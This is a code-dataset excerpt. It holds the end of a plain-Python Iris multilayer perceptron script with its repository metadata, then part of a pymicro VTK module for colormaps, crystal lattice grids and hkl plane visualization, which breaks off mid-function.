test_X = [data[:4] for data in datatest]
test_y = [data[4] for data in datatest]
"""
SECTION 2 : Build and Train Model
Multilayer perceptron model, with one hidden layer.
input layer : 4 neurons, represents the features of Iris
hidden layer : 4 neurons, activation using sigmoid
output layer : 3 neurons, represents the class of Iris
optimizer = stochastic gradient descent
loss function = mean squared error
learning rate = 0.005
epoch = 400
best result = 96.67%
"""
def matrix_mul_bias(A, B, bias): # Matrix multiplication (for Testing)
C = [[0 for i in range(len(B[0]))] for i in range(len(A))]
for i in range(len(A)):
for j in range(len(B[0])):
for k in range(len(B)):
C[i][j] += A[i][k] * B[k][j]
C[i][j] += bias[j]
return C
def vec_mat_bias(A, B, bias): # Vector (A) x matrix (B) multiplication
C = [0 for i in range(len(B[0]))]
for j in range(len(B[0])):
for k in range(len(B)):
C[j] += A[k] * B[k][j]
C[j] += bias[j]
return C
def mat_vec(A, B): # Matrix (A) x vector (B) multiplication (for backprop)
C = [0 for i in range(len(A))]
for i in range(len(A)):
for j in range(len(B)):
C[i] += A[i][j] * B[j]
return C
def sigmoid(A, deriv=False):
if deriv: # derivation of sigmoid (for backprop)
for i in range(len(A)):
A[i] = A[i] * (1 - A[i])
else:
for i in range(len(A)):
A[i] = 1 / (1 + math.exp(-A[i]))
return A
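# Note: sigmoid(A, deriv=True) expects A to already hold sigmoid outputs,
# since s'(x) = s(x) * (1 - s(x)). Worked example: s(0) = 0.5, so the
# derivative at x = 0 is 0.5 * (1 - 0.5) = 0.25.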
# Define parameter
alfa = 0.005
epoch = 400
neuron = [4, 4, 3] # number of neurons in each layer
# Initialize weights and biases with zero values
weight = [[0 for j in range(neuron[1])] for i in range(neuron[0])]
weight_2 = [[0 for j in range(neuron[2])] for i in range(neuron[1])]
bias = [0 for i in range(neuron[1])]
bias_2 = [0 for i in range(neuron[2])]
# Initialize weights with random values between -1.0 and 1.0
for i in range(neuron[0]):
for j in range(neuron[1]):
weight[i][j] = 2 * random.random() - 1
for i in range(neuron[1]):
for j in range(neuron[2]):
weight_2[i][j] = 2 * random.random() - 1
for e in range(epoch):
cost_total = 0
for idx, x in enumerate(train_X): # Update for each data; SGD
# Forward propagation
h_1 = vec_mat_bias(x, weight, bias)
X_1 = sigmoid(h_1)
h_2 = vec_mat_bias(X_1, weight_2, bias_2)
X_2 = sigmoid(h_2)
# Convert to One-hot target
target = [0, 0, 0]
target[int(train_y[idx])] = 1
        # Cost function: mean squared error over the output neurons
        error = 0
        for i in range(neuron[2]):
            error += (target[i] - X_2[i]) ** 2
        cost_total += error * 1 / neuron[2]
# Backward propagation
# Update weight_2 and bias_2 (layer 2)
delta_2 = []
for j in range(neuron[2]):
delta_2.append(-1 * 2. / neuron[2] * (target[j]-X_2[j]) * X_2[j] * (1-X_2[j]))
for i in range(neuron[1]):
for j in range(neuron[2]):
weight_2[i][j] -= alfa * (delta_2[j] * X_1[i])
bias_2[j] -= alfa * delta_2[j]
# Update weight and bias (layer 1)
delta_1 = mat_vec(weight_2, delta_2)
for j in range(neuron[1]):
delta_1[j] = delta_1[j] * (X_1[j] * (1-X_1[j]))
for i in range(neuron[0]):
for j in range(neuron[1]):
weight[i][j] -= alfa * (delta_1[j] * x[i])
bias[j] -= alfa * delta_1[j]
cost_total /= len(train_X)
if(e % 100 == 0):
print(cost_total)
"""
SECTION 3 : Testing
"""
res = matrix_mul_bias(test_X, weight, bias)
res = [sigmoid(r) for r in res]  # apply the hidden-layer activation, as in training
res_2 = matrix_mul_bias(res, weight_2, bias_2)  # bias_2, not bias, for the output layer
# Get prediction
preds = []
for r in res_2:
preds.append(max(enumerate(r), key=lambda x:x[1])[0])
# Print prediction
print(preds)
# Calculate accuracy
acc = 0.0
for i in range(len(preds)):
if preds[i] == int(test_y[i]):
acc += 1
print(acc / len(preds) * 100, "%")
|
rianrajagede/simplesamplecode
|
Python/iris_plain_mlp.py
|
Python
|
mit
| 4,759
|
[
"NEURON"
] |
63e229d48bf44e3113f2b8574e03f9f12833ae25c896669a443ea0bf9185820a
|
import os
import sys
import vtk
import numpy as np
from vtk.util.colors import red, green, black, white, grey, blue, orange, peacock
from vtk.util import numpy_support
# see if some of the stuff needs to be moved to the Microstructure module
from pymicro.crystal.lattice import Lattice, HklPlane
def to_vtk_type(type):
'''Function to get the VTK data type given a numpy data type.
:param str type: The numpy data type like 'uint8', 'uint16'...
:return: A VTK data type.
'''
if type == 'uint8':
return vtk.VTK_UNSIGNED_CHAR
elif type == 'uint16':
return vtk.VTK_UNSIGNED_SHORT
elif type == 'uint32':
return vtk.VTK_UNSIGNED_INT
elif type == 'float':
return vtk.VTK_FLOAT
elif type == 'float64':
return vtk.VTK_DOUBLE
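# Example (sketch): map a numpy array's dtype string to the VTK constant.
#   vtk_type = to_vtk_type(str(np.zeros(8, dtype='uint8').dtype))  # VTK_UNSIGNED_CHAR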
def rand_cmap(N=256, first_is_black=False, table_range=(0, 255)):
'''Create a VTK lookup table with random colors.
    The first color can be forced to black, which typically represents
    the image background. The random seed is fixed to 13 in order
    to consistently produce the same colormap.
    :param int N: The number of colors in the colormap.
    :param bool first_is_black: Force the first color to be black.
    :param tuple table_range: The range of the VTK lookup table.
:return: A vtkLookupTable lookup table with N random colors.
'''
np.random.seed(13)
rand_colors = np.random.rand(N, 3)
if first_is_black:
rand_colors[0] = [0., 0., 0.] # enforce black background
lut = vtk.vtkLookupTable()
lut.SetNumberOfTableValues(N)
lut.Build()
for i in range(N):
lut.SetTableValue(i, rand_colors[i][0], rand_colors[i][1], rand_colors[i][2], 1.0)
lut.SetRange(table_range)
return lut
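# Example (sketch): a random colormap suits labeled images such as grain maps,
# with label 0 rendered black as the background.
#   lut = rand_cmap(N=256, first_is_black=True, table_range=(0, 255))
#   # then attach it to any mapper with mapper.SetLookupTable(lut)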
def pv_rand_cmap(N=256, first_is_black=False):
'''Write out the random color map in paraview xml format.
    This method prints out the XML declaration of the random colormap.
    The output may be saved to a text file and used in paraview.
:param int N: The number of colors in the colormap.
:param bool first_is_black: Force the first color to be black.
'''
np.random.seed(13)
rand_colors = np.random.rand(N, 3)
if first_is_black:
rand_colors[0] = [0., 0., 0.] # enforce black background
print('<ColorMap name="random" space="RGB">')
for i in range(N):
print('<Point x="%d" o="1" r="%8.6f" g="%8.6f" b="%8.6f"/>' %
(i, rand_colors[i][0], rand_colors[i][1], rand_colors[i][2]))
print('</ColorMap>')
def pyplot_cmap(name='viridis', table_range=(0, 255)):
"""Create a VTK colormap from pyplot.
    :param str name: the color map name to import from pyplot.
    :param tuple table_range: start and end values for the VTK table range.
    :return: a vtkLookupTable built from the pyplot colormap.
"""
from matplotlib import cm
cmap = cm.get_cmap(name)
lut = vtk.vtkLookupTable()
lut.SetNumberOfTableValues(256)
lut.Build()
for i in range(256):
lut.SetTableValue(i, *cmap([i]))
lut.SetRange(table_range)
return lut
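# Example (sketch, requires matplotlib): reuse a pyplot colormap in VTK.
#   lut = pyplot_cmap(name='viridis', table_range=(0, 255))
#   # then mapper.SetLookupTable(lut) as with any other lookup table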
def gray_cmap(table_range=(0, 255)):
    '''Create a black and white colormap.
*Parameters*
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable from black to white.
'''
lut = vtk.vtkLookupTable()
lut.SetSaturationRange(0, 0)
lut.SetHueRange(0, 0)
lut.SetTableRange(table_range)
lut.SetValueRange(0, 1)
lut.SetRampToLinear()
lut.Build()
return lut
def invert_cmap(ref_lut):
'''invert a VTK lookup table.
*Parameters*
**ref_lut**: The lookup table to invert.
*Returns*
A reverse vtkLookupTable.
'''
N = ref_lut.GetNumberOfTableValues()
lut = vtk.vtkLookupTable()
lut.SetNumberOfTableValues(N)
lut.Build()
for i in range(N):
        lut.SetTableValue(i, ref_lut.GetTableValue(N - 1 - i))  # N - 1 - i keeps indices within 0..N-1
lut.SetRange(ref_lut.GetTableRange())
return lut
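# Example (sketch): build a white-to-black table by reversing gray_cmap.
#   inverted_gray = invert_cmap(gray_cmap())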
def hsv_cmap(N=64, table_range=(0, 255)):
'''Create a VTK look up table similar to matlab's hsv.
*Parameters*
**N**: int, number of colors in the table.
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable.
'''
lut = vtk.vtkLookupTable()
lut.SetHueRange(0.0, 1.0)
lut.SetSaturationRange(1.0, 1.0)
lut.SetValueRange(1.0, 1.0)
lut.SetNumberOfColors(N)
lut.Build()
lut.SetRange(table_range)
return lut
def jet_cmap(N=64, table_range=(0, 255)):
'''Create a VTK look up table similar to matlab's jet.
*Parameters*
**N**: int, number of colors in the table.
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable from blue to red.
'''
lut = vtk.vtkLookupTable()
lut.SetHueRange(0.667, 0.0)
lut.SetNumberOfColors(N)
lut.Build()
lut.SetRange(table_range)
return lut
def hot_cmap(table_range=(0, 255)):
'''Create a VTK look up table similar to matlab's hot.
*Parameters*
**table_range**: 2 values tuple (default: (0,255))
start and end values for the table range.
*Returns*
A vtkLookupTable from white to red.
'''
lut = vtk.vtkLookupTable()
lutNum = 64
lut.SetNumberOfTableValues(lutNum)
lut.Build()
    # matlab-style 'hot' ramp: black to red (entries 0-23), red to yellow
    # (24-47), yellow to white (48-63); same values as the original
    # hand-written table, up to rounding in the sixth decimal.
    for i in range(lutNum):
        if i < 24:
            r, g, b = (i + 1) / 24., 0., 0.
        elif i < 48:
            r, g, b = 1., (i - 23) / 24., 0.
        else:
            r, g, b = 1., 1., (i - 47) / 16.
        lut.SetTableValue(i, r, g, b, 1.0)
lut.SetRange(table_range)
return lut
def add_hklplane_to_grain(hkl_plane, grid, orientation, origin=(0, 0, 0), opacity=1.0,
show_normal=False, normal_length=1.0, show_intersection=False, color_intersection=red):
"""Add a plane describing a crystal lattice plane to a VTK grid.
:param hkl_plane: an instance of `HklPlane` describing the lattice plane.
:param grid: a vtkunstructuredgrid instance representing the geometry of the grain.
:param orientation: the grain orientation.
:param origin: the origin of the plane in the grain.
    :param float opacity: opacity value of the plane.
:param show_normal: A flag to show the plane normal.
:param normal_length: The length of the plane normal.
:param show_intersection: A flag to show the intersection of the plane with the grain.
:param tuple color_intersection: The color to display the intersection of the plane with the grain.
:return: A VTK assembly with the grain, the plane, its normal and edge intersection if requested.
"""
# compute the plane normal in the laboratory frame using the grain orientation
gt = orientation.orientation_matrix().transpose()
n_rot = np.dot(gt, hkl_plane.normal() / np.linalg.norm(hkl_plane.normal()))
rot_plane = vtk.vtkPlane()
rot_plane.SetOrigin(origin)
# rotate the plane by setting the normal
rot_plane.SetNormal(n_rot)
return add_plane_to_grid(rot_plane, grid, opacity=opacity, show_normal=show_normal, normal_length=normal_length,
show_intersection=show_intersection, color_intersection=color_intersection)
def add_slip_system_to_grain(slip_system, grid, orientation, origin=(0, 0, 0), opacity=1.0,
show_normal=False, normal_length=1.0, show_intersection=False, color_intersection=red):
"""Add a slip system to a VTK grid.
:param slip_system: an instance of `SlipSystem` describing the slip system.
:param grid: a vtkunstructuredgrid instance representing the geometry of the grain.
:param orientation: the grain orientation.
:param origin: the origin of the plane in the grain.
:param float opacity: opacity value of the plane.
:param show_normal: A flag to show the plane normal.
:param normal_length: The length of the plane normal.
:param show_intersection: A flag to show the intersection of the plane with the grain.
:param tuple color_intersection: The color to display the intersection of the plane with the grain.
:return: A VTK assembly with the grain, the plane, its normal and edge intersection if requested and the slip
direction.
"""
# compute the plane normal in the laboratory frame using the grain orientation
gt = orientation.orientation_matrix().transpose()
slip_plane = slip_system.get_slip_plane()
slip_dir = slip_system.get_slip_direction()
n_rot = np.dot(gt, slip_plane.normal() / np.linalg.norm(slip_plane.normal()))
l_rot = np.dot(gt, slip_dir.direction() / np.linalg.norm(slip_dir.direction()))
rot_plane = vtk.vtkPlane()
rot_plane.SetOrigin(origin)
# rotate the plane by setting the normal
rot_plane.SetNormal(n_rot)
assembly = add_plane_to_grid(rot_plane, grid, opacity=opacity,
show_normal=show_normal, normal_length=normal_length,
show_intersection=show_intersection,
color_intersection=color_intersection)
slip_dir_actor = unit_arrow_3d(origin, normal_length * l_rot,
make_unit=False, color=peacock)
assembly.AddPart(slip_dir_actor)
return assembly
def add_plane_to_grid(plane, grid, origin=None, color=None, opacity=0.3, show_normal=False, normal_length=1.0,
show_intersection=False, color_intersection=red):
"""Add a 3d plane inside another object.
This function adds a plane inside another object described by a mesh (vtkunstructuredgrid).
The method is to use a vtkCutter with the mesh as input and the plane as the cut function.
The plane normal can be displayed and its length controlled.
This may be used directly to add hkl planes inside a lattice cell or
a grain.
:param plane: A VTK implicit function describing the plane to add.
:param grid: A VTK unstructured grid in which the plane is to be added.
:param tuple origin: (x, y, z) tuple to define the origin of the plane.
:param tuple color: A color defined by its rgb components.
:param float opacity: Opacity value of the plane actor.
:param bool show_normal: A flag to display the plane normal.
:param normal_length: The length of the plane normal vector (1.0 by default).
:param bool show_intersection: Also add the intersection of the plane with the grid in the assembly.
:param tuple color_intersection: The color to display the intersection of the plane with the grid.
:returns: A VTK assembly with the mesh, the plane, its normal and edge intersection if requested.
"""
# prepare an assembly for the result
assembly = vtk.vtkAssembly()
# cut the unstructured grid with the plane
planeCut = vtk.vtkCutter()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
planeCut.SetInputData(grid)
else:
planeCut.SetInput(grid)
planeCut.SetCutFunction(plane)
cutMapper = vtk.vtkPolyDataMapper()
cutMapper.SetInputConnection(planeCut.GetOutputPort())
cutActor = vtk.vtkActor()
cutActor.SetMapper(cutMapper)
if color:
cutActor.GetProperty().SetColor(color)
cutActor.GetProperty().SetOpacity(opacity)
assembly.AddPart(cutActor)
if show_normal:
# add an arrow to display the normal to the plane
if origin is None:
origin = plane.GetOrigin()
arrowActor = unit_arrow_3d(origin, normal_length * np.array(plane.GetNormal()), make_unit=False)
assembly.AddPart(arrowActor)
if show_intersection:
extract = vtk.vtkFeatureEdges()
extract.SetInputConnection(planeCut.GetOutputPort())
edge_mapper = vtk.vtkPolyDataMapper()
edge_mapper.SetInputConnection(extract.GetOutputPort())
edge_mapper.SetScalarVisibility(0)
edge_actor = vtk.vtkActor()
edge_actor.SetMapper(edge_mapper)
edge_actor.GetProperty().SetColor(color_intersection)
edge_actor.GetProperty().SetLineWidth(3.0)
assembly.AddPart(edge_actor)
return assembly
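# Example (sketch): cut a unit cell grid with a plane through its center.
#   plane = vtk.vtkPlane()
#   plane.SetOrigin(0.5, 0.5, 0.5)
#   plane.SetNormal(1., 1., 0.)
#   assembly = add_plane_to_grid(plane, grid, opacity=0.5, show_normal=True)
#   # here 'grid' is any vtkUnstructuredGrid, e.g. built by lattice_grid below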
def axes_actor(length=1.0, axisLabels=('x', 'y', 'z'), fontSize=20, color=None):
'''Build an actor for the cartesian axes.
:param length: The arrow length of the axes (1.0 by default).
:type length: float or triple of float to specify the length of each axis individually.
:param list axisLabels: Specify the axes labels (xyz by default), use axisLabels = None to hide the axis labels
:param int fontSize: Font size for the axes labels (20 by default).
:param tuple color: A single color defined by its rgb components (not set by default which keep the red, green, blue colors).
:returns: A VTK assembly representing the cartesian axes.
'''
axes = vtk.vtkAxesActor()
if isinstance(length, (float, int, np.int64, np.float64)):
axes.SetTotalLength(length, length, length)
else:
assert(len(length) == 3)
axes.SetTotalLength(length)
axes.SetShaftTypeToCylinder()
axes.SetCylinderRadius(0.02)
if axisLabels:
axes.GetXAxisCaptionActor2D().GetTextActor().SetTextScaleModeToNone()
axes.GetYAxisCaptionActor2D().GetTextActor().SetTextScaleModeToNone()
axes.GetZAxisCaptionActor2D().GetTextActor().SetTextScaleModeToNone()
axprop = vtk.vtkTextProperty()
axprop.SetColor(0, 0, 0)
axprop.SetFontSize(fontSize)
axprop.SetFontFamilyToArial()
axes.GetXAxisCaptionActor2D().SetCaptionTextProperty(axprop)
axes.GetYAxisCaptionActor2D().SetCaptionTextProperty(axprop)
axes.GetZAxisCaptionActor2D().SetCaptionTextProperty(axprop)
axes.SetXAxisLabelText(axisLabels[0])
axes.SetYAxisLabelText(axisLabels[1])
axes.SetZAxisLabelText(axisLabels[2])
else:
axes.SetAxisLabels(0)
if color:
# set the color of the whole triad
collection = vtk.vtkPropCollection()
axes.GetActors(collection)
for i in range(collection.GetNumberOfItems()):
collection.GetItemAsObject(i).GetProperty().SetColor(color)
return axes
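# Example (sketch): a 10-unit black triad without labels, e.g. for an inset.
#   axes = axes_actor(length=10.0, axisLabels=None, color=black)
#   # renderer.AddActor(axes) on any vtkRenderer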
def grain_3d(grain, hklplanes=None, show_normal=False, plane_origins=None,
plane_opacity=1.0, show_orientation=False, N=2048, verbose=False):
"""Creates a 3d representation of a crystallographic grain.
This method creates a vtkActor object of the surface mesh
representing a Grain object. An optional list of crystallographic
planes can be given
:param grain: the Grain object to be shown in 3d.
:param list hklplanes: the list of HklPlanes object to add to the assembly.
:param bool show_normal: show also the normal to the hkl planes if True.
:param list plane_origins: the list of each plane origin (3d scene coordinates).
    :param float plane_opacity: set the opacity of the lattice plane actors.
:param bool show_orientation: show also the grain orientation with a vtkAxesActor placed at the grain center if True.
:param int N: the number of colors to use in the colormap.
:param bool verbose: activate verbose mode.
:returns: a vtkAssembly of the grain mesh and the optional hkl planes.
"""
assembly = vtk.vtkAssembly()
# create mapper
mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(grain.vtkmesh)
else:
mapper.SetInput(grain.vtkmesh)
    mapper.ScalarVisibilityOff()  # we use the grain id for choosing the color
lut = rand_cmap(N, first_is_black=True, table_range=(0, N - 1))
grain_actor = vtk.vtkActor()
if verbose:
print(grain.id)
print(lut.GetTableValue(grain.id)[0:3])
grain_actor.GetProperty().SetColor(lut.GetTableValue(grain.id)[0:3])
grain_actor.GetProperty().SetOpacity(0.3)
grain_actor.SetMapper(mapper)
assembly.AddPart(grain_actor)
if show_orientation:
local_orientation = add_local_orientation_axes(grain.orientation, axes_length=30)
# add local orientation to the grain actor
assembly.AddPart(local_orientation)
# add all hkl planes
if hklplanes:
from itertools import cycle
# colors for the intersection
it = cycle([red, green, blue, orange])
# look at each hkl plane in the list
for i, hklplane in enumerate(hklplanes):
# the grain has its center of mass at the origin
origin = [(0., 0., 0.)]
color = next(it)
if plane_origins is not None:
origin = plane_origins[i] # in unit of the 3d scene
if verbose:
print('using origin %s' % str(origin))
if type(origin) is not list:
origin = [plane_origins[i]]
# we will add a series of this plane (one per origin value)
for o in origin:
hklplaneActor = add_hklplane_to_grain(hklplane, grain.vtkmesh,
grain.orientation, origin=o, opacity=plane_opacity,
show_normal=show_normal, normal_length=50.,
show_intersection=True, color_intersection=color)
assembly.AddPart(hklplaneActor)
color = next(it)
return assembly
# deprecated, will be removed soon
def add_grain_to_3d_scene(grain, hklplanes, show_orientation=False):
assembly = vtk.vtkAssembly()
# create mapper
print('creating grain actor')
mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(grain.vtkmesh)
else:
mapper.SetInput(grain.vtkmesh)
mapper.ScalarVisibilityOff() # we use the grain id for choosing the color
lut = rand_cmap(N=2048, first_is_black=True, table_range=(0, 2047))
grain_actor = vtk.vtkActor()
grain_actor.GetProperty().SetColor(lut.GetTableValue(grain.id)[0:3])
grain_actor.SetMapper(mapper)
assembly.AddPart(grain_actor)
# add all hkl planes and local grain orientation actor
if show_orientation:
grain_actor.GetProperty().SetOpacity(0.3)
local_orientation = add_HklPlanes_with_orientation_in_grain(grain, hklplanes)
# add local orientation to the grain actor
assembly.AddPart(local_orientation)
return assembly
def add_local_orientation_axes(orientation, axes_length=30):
# use a vtkAxesActor to display the crystal orientation
local_orientation = vtk.vtkAssembly()
axes = axes_actor(length=axes_length, axisLabels=False)
apply_orientation_to_actor(axes, orientation)
    # equivalent explicit transform (kept for reference):
    # transform = vtk.vtkTransform()
    # transform.Identity()
    # transform.RotateZ(orientation.phi1())
    # transform.RotateX(orientation.Phi())
    # transform.RotateZ(orientation.phi2())
    # axes.SetUserTransform(transform)
local_orientation.AddPart(axes)
return local_orientation
def add_HklPlanes_with_orientation_in_grain(grain, \
hklplanes=[]):
'''
Add some plane actors corresponding to a list of (hkl) planes to
a grain actor.
'''
# use a vtkAxesActor to display the crystal orientation
local_orientation = vtk.vtkAssembly()
grain_axes = axes_actor(length=30, axisLabels=False)
apply_orientation_to_actor(grain_axes, grain.orientation)
local_orientation.AddPart(grain_axes)
# add all hkl planes to the grain
for hklplane in hklplanes:
hklplaneActor = add_hklplane_to_grain(hklplane, grain.vtkmesh, \
grain.orientation)
local_orientation.AddPart(hklplaneActor)
return local_orientation
def unit_arrow_3d(start, vector, color=orange, radius=0.03, make_unit=True, label=False, text=None, text_scale=0.1,
vector_normal=None):
n = np.linalg.norm(vector)
arrowSource = vtk.vtkArrowSource()
arrowSource.SetShaftRadius(radius)
arrowSource.SetTipRadius(10 * radius / 3.)
# We build a local direct base with X being the unit arrow vector
X = vector / n
arb = np.array([1, 0, 0])
if abs(np.dot(X, arb)) == 1: # avoid using 2 colinear vectors
arb = np.array([0, 1, 0])
Z = np.cross(X, arb)
Y = np.cross(Z, X)
m = vtk.vtkMatrix4x4()
m.Identity()
m.DeepCopy((1, 0, 0, start[0],
0, 1, 0, start[1],
0, 0, 1, start[2],
0, 0, 0, 1))
# Create the direction cosine matrix
if make_unit:
n = 1
for i in range(3):
m.SetElement(i, 0, n * X[i])
m.SetElement(i, 1, n * Y[i])
m.SetElement(i, 2, n * Z[i])
t = vtk.vtkTransform()
t.Identity()
t.Concatenate(m)
transArrow = vtk.vtkTransformFilter()
transArrow.SetInputConnection(arrowSource.GetOutputPort())
transArrow.SetTransform(t)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(transArrow.GetOutputPort())
arrowActor = vtk.vtkActor()
arrowActor.SetMapper(mapper)
arrowActor.GetProperty().SetColor(color)
if label:
# add a text actor to display the vector coordinates
assembly = vtk.vtkAssembly()
assembly.AddPart(arrowActor)
vectorText = vtk.vtkVectorText()
        if text is None:
# display the vector coordinates as text
vectorText.SetText(np.array_str(vector))
else:
vectorText.SetText(text)
textMapper = vtk.vtkPolyDataMapper()
textMapper.SetInputConnection(vectorText.GetOutputPort())
textTransform = vtk.vtkTransform()
start_text = start + vector
mt = vtk.vtkMatrix4x4()
mt.Identity()
mt.DeepCopy((1, 0, 0, start_text[0],
0, 1, 0, start_text[1],
0, 0, 1, start_text[2],
0, 0, 0, 1))
# Create the direction cosine matrix
        if vector_normal is None:
            vector_normal = Z
        for i in range(3):
            mt.SetElement(i, 0, vector[i])
            mt.SetElement(i, 1, Y[i])
            mt.SetElement(i, 2, vector_normal[i])
textTransform.Identity()
textTransform.Concatenate(mt)
textTransform.Scale(text_scale, text_scale, text_scale)
textActor = vtk.vtkActor()
textActor.SetMapper(textMapper)
textActor.SetUserTransform(textTransform)
textActor.GetProperty().SetColor(color)
assembly.AddPart(textActor)
return assembly
else:
return arrowActor
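# Example (sketch): a labeled arrow along [110] starting from the origin.
#   arrow = unit_arrow_3d((0., 0., 0.), np.array([1., 1., 0.]), color=red,
#                         label=True, text='[110]')
#   # returns a vtkAssembly when label=True, a plain vtkActor otherwise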
def lattice_points(lattice, origin=(0., 0., 0.), m=1, n=1, p=1):
'''
Create a vtk representation of a the lattice points.
A vtkPoints instance is used to store the lattice points, including
the points not on the lattice corners according to the system
centering (may be P, I, F for instance).
:param Lattice lattice: The Lattice instance from which to construct the points.
:param tuple origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
    :return: A vtkPoints instance with all the lattice points, the cell corner points first, followed by any extra centering points.
'''
[A, B, C] = lattice._matrix
O = origin
points = vtk.vtkPoints()
# create all the points based on the lattice matrix
for k in range(p + 1):
for j in range(n + 1):
for i in range(m + 1):
points.InsertNextPoint(O + i * A + j * B + k * C)
# now add extra points to represent the lattice centering
for k in range(p):
for j in range(n):
for i in range(m):
O = origin + i * A + j * B + k * C
if lattice._centering == 'P':
pass # nothing to do
elif lattice._centering == 'I':
points.InsertNextPoint(O + 0.5 * A + 0.5 * B + 0.5 * C)
elif lattice._centering == 'A':
points.InsertNextPoint(O + 0.5 * B + 0.5 * C)
points.InsertNextPoint(O + A + 0.5 * B + 0.5 * C)
elif lattice._centering == 'B':
points.InsertNextPoint(O + 0.5 * A + 0.5 * C)
points.InsertNextPoint(O + 0.5 * A + B + 0.5 * C)
elif lattice._centering == 'C':
points.InsertNextPoint(O + 0.5 * A + 0.5 * B)
points.InsertNextPoint(O + 0.5 * A + 0.5 * B + C)
elif lattice._centering == 'F':
points.InsertNextPoint(O + 0.5 * A + 0.5 * B)
points.InsertNextPoint(O + 0.5 * A + 0.5 * B + C)
points.InsertNextPoint(O + 0.5 * B + 0.5 * C)
points.InsertNextPoint(O + 0.5 * B + 0.5 * C + A)
points.InsertNextPoint(O + 0.5 * C + 0.5 * A)
points.InsertNextPoint(O + 0.5 * C + 0.5 * A + B)
return points
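# A small self-contained sketch (hypothetical helper, not part of the original
# API) mirroring the centering logic above: it returns the number of points
# that `lattice_points` inserts for a given centering and cell counts.
def _expected_lattice_point_count(centering, m=1, n=1, p=1):
    corners = (m + 1) * (n + 1) * (p + 1)  # shared cell corners
    extra_per_cell = {'P': 0, 'I': 1, 'A': 2, 'B': 2, 'C': 2, 'F': 6}
    return corners + extra_per_cell[centering] * m * n * p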
def lattice_grid(lattice, origin=(0., 0., 0.), m=1, n=1, p=1):
"""
Create a mesh representation of a crystal lattice.
    A vtkUnstructuredGrid instance is used with a hexahedron element
corresponding to the lattice system. Any number of cells can be
displayed (just one by default).
:param Lattice lattice: The Lattice instance from which to construct the grid.
:param tuple origin: cartesian coordinates of the origin.
:param int m: the number of cells in the [100] direction (1 by default).
:param int n: the number of cells in the [010] direction (1 by default).
:param int p: the number of cells in the [001] direction (1 by default).
    :return: A vtkUnstructuredGrid with (m x n x p) hexahedron cells representing the crystal lattice.
"""
points = lattice_points(lattice, origin, m, n, p)
# build the unstructured grid with m x n x p cells
grid = vtk.vtkUnstructuredGrid()
grid.SetPoints(points)
grid.Allocate(p * n * m, 1)
for k in range(p):
for j in range(n):
for i in range(m):
# ids list
Ids = vtk.vtkIdList()
Ids.InsertNextId(i + j * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + j * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + (j + 1) * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + (j + 1) * (m + 1) + k * (m + 1) * (n + 1))
Ids.InsertNextId(i + j * (m + 1) + (k + 1) * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + j * (m + 1) + (k + 1) * (m + 1) * (n + 1))
Ids.InsertNextId(i + 1 + (j + 1) * (m + 1) + (k + 1) * (m + 1) * (n + 1))
Ids.InsertNextId(i + (j + 1) * (m + 1) + (k + 1) * (m + 1) * (n + 1))
grid.InsertNextCell(vtk.VTK_HEXAHEDRON, Ids)
return grid
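# The hexahedron connectivity above relies on the corner point ordering used
# by `lattice_points`. This hypothetical helper makes the indexing rule
# explicit: the corner at integer cell coordinates (i, j, k) has the id
# i + j * (m + 1) + k * (m + 1) * (n + 1).
def _corner_point_id(i, j, k, m, n):
    return i + j * (m + 1) + k * (m + 1) * (n + 1)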
def hexagonal_lattice_grid(lattice, origin=(0., 0., 0.)):
"""
Create a mesh representation of a hexagonal crystal lattice.
A vtkUnstructuredGrid instance is used with a hexagonal prism element
corresponding to 3 unit cells of the lattice system.
:param Lattice lattice: The Lattice instance from which to construct the grid.
:param tuple origin: cartesian coordinates of the origin.
    :return: A vtkUnstructuredGrid with one hexagonal prism cell representing the crystal lattice.
"""
[A, B, C] = lattice._matrix
O = origin
points = vtk.vtkPoints()
points.InsertNextPoint(O)
points.InsertNextPoint(O + A)
points.InsertNextPoint(O + A - B)
points.InsertNextPoint(O - 2 * B)
points.InsertNextPoint(O - 2 * B - A)
points.InsertNextPoint(O - B - A)
points.InsertNextPoint(O + C)
points.InsertNextPoint(O + A + C)
points.InsertNextPoint(O + A - B + C)
points.InsertNextPoint(O - 2 * B + C)
points.InsertNextPoint(O - 2 * B - A + C)
points.InsertNextPoint(O - B - A + C)
    ids = vtk.vtkIdList()
    for point_id in range(12):
        ids.InsertNextId(point_id)
# build the unstructured grid with one cell
grid = vtk.vtkUnstructuredGrid()
grid.Allocate(1, 1)
    grid.InsertNextCell(vtk.VTK_HEXAGONAL_PRISM, ids)  # cell type 16
grid.SetPoints(points)
return grid
def lattice_edges(grid, tubeRadius=0.02, tubeColor=grey):
'''
Create the 3D representation of crystal lattice edges.
*Parameters*
**grid**: vtkUnstructuredGrid
The vtkUnstructuredGrid instance representing the crystal lattice.
**tubeRadius**: float
Radius of the tubes representing the atomic bonds (default: 0.02).
**tubeColor**: vtk color
    Color of the tubes representing the atomic bonds (default: grey).
    *Returns*
    The method returns a vtk actor for the lattice edges.
'''
Edges = vtk.vtkExtractEdges()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
Edges.SetInputData(grid)
else:
Edges.SetInput(grid)
Tubes = vtk.vtkTubeFilter()
Tubes.SetInputConnection(Edges.GetOutputPort())
Tubes.SetRadius(tubeRadius)
Tubes.SetNumberOfSides(6)
Tubes.UseDefaultNormalOn()
Tubes.SetDefaultNormal(.577, .577, .577)
# Create the mapper and actor to display the cell edges.
TubeMapper = vtk.vtkPolyDataMapper()
TubeMapper.SetInputConnection(Tubes.GetOutputPort())
    edge_actor = vtk.vtkActor()
    edge_actor.SetMapper(TubeMapper)
    edge_actor.GetProperty().SetDiffuseColor(tubeColor)
